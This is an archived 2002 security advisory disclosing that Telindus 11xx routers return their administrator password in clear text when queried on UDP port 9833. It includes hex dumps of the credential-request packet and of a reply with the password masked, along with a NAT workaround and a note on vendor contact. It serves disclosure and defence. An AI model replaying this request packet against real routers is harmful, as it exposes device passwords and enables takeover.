OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: finelliieee.org
Date: Wed Jun 05 2002 - 12:43:00 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                            :::Title:::

            Some vulnerabilities in the Telindus 11xx router series

            by finelliieee.org, kurgantigerteam.it

                            :::Abstract:::

    The 11xx router series by Telindus (http://www.telindus.com) has a very
    serious remotely exploitable compromise, due to the fact that an
    intruder may mimic the behaviour of a desktop management application,
    thus getting control of the router.

                            :::The Problem:::

    The 11xx router series has a management program, freely downloadable
    from the Telindus site, that allows to remotely administer the router.

    This program tries to discovery router boxes in the LAN through UDP
    broadcast. Next it sends another different UDP unicast packet to the
    answering boxes, to which the router answers with an UDP packet that
    contains, among the others, the software revision number, the router
    name and the password for accessing the device.

    All the information are clear text. All the traffic happens on UDP port
    9833.

    It is possible to exploit this behaviour in a billion ways: on a LAN it
    is enough to download and run the administration tool while simply
    sniffing the traffic. On a WAN it is enough to craft an hand-made packet
    that queries the router in the same way the management program does.

    As an example, this is the complete dump (with the Ethernet frame) of a
    ``request'' packet. The payload is the last 62 bytes, beginning from
    ``19 73 04'', the sender address is 172.16.0.16 and the router (recipient)
    is 172.16.0.253:

    00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
    00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
    00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
    00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
    04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
    01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF

    This is the dump of an ``answer'' packet (with the Ethernet frame). The
    payload is the last 204 bytes, beginning from ``19 73 04''. The password
    has been replaced by ``x''

    00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
    00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
    00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
    00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
    0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
    00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
    76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
    44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
    32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
    6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
    00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
    00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
    40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
    01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
    00 00 42 05 00 00 42 22 00 00 04 18 00 00

                            :::The Solution:::

    We have not been able to understand if this ``feature'' can be disabled.
    Otherwise, it seems that the only solution would be to filter the traffic
    on UDP port 9833 directed to the box.

    A quick and dirty workaround is to redirect WAN traffic to port
    9833/udp to another IP address in the LAN, better if it's an unused one.
    This can be achieved by telnetting to the router, logging in, and
    issuing the followind command: ``add auto udp 9833 9833 9833 10.0.0.10'',
    where 10.0.0.10 is some unused IP address in your LAN. This sets up a
    static NAT rule that redirects traffic entering WAN interface. Then, you
    must also enter the command ``save'' to save your configuration to NVRAM.
    You can optionally check the status of the NAT table by issuing ``show
    auto''. If you made some mistake, you can ``del auto <number>'', and then
    retry. Maybe there are better methods, we used this one because of we
    already knew how to use the command ``auto''.

                            :::Notes:::

    We contacted Telindus, through their Italian office. They told us that
    they are actively working on this issue. We told them that after a month
    we would have informed the security community of the problem.

    Telindus told us that a beta version of the firmware should be available
    soon. Last but not least, the banner of the router has the word Arescom
    in it, so perhaps other devices from that vendor are exploitable: we
    have none at our disposition, so we have not been able to check.

                            :::Acknowledgements:::

    Permission to copy or publish this note is granted as long as the
    copyright notice is kept intact.

            (C) 2002 finelliieee.org, kurgantigerteam.it

    This document is freely available from:

            http://www.tigerteam.it
            http://www.trustnet.it

                            :::Disclaimer:::

    Strangely enough we have been able to discover this problem in spite of
    DMCA and similar initiatives, since we did not even need to reverse
    engineer the code of any application: we were simply monitoring the
    network for totally unrelated issues and we happened to log a ``strange
    communication'' on the UDP port 9833. Notice that the payload is in
    clear text and that the juxtaposition of the router name and of a text
    string leaves little to imagination.

    NO WARRANTY

    This document is furnished on an "as is" basis. We make no warranties
    of any kind, either expressed or implied as to any matter including,
    but not limited to, warranty of fitness for a particular purpose or
    merchantability, exclusivity or results obtained from use of the
    material. We do not make any warranty of any kind with respect to
    freedom from patent, trademark, or copyright infringement.